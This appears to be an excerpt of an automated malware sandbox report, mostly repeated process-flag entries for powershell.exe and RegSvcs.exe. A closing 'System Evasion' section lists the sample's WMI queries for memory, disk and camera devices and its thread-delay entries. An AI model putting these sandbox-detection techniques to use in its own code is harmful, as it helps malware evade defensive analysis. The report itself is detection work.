                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2061Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1181Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4995Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 614Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5201Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 560Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3974Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1128Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 4546Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 5245Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 2020Thread sleep time: -30000s >= -30000sJump to behavior
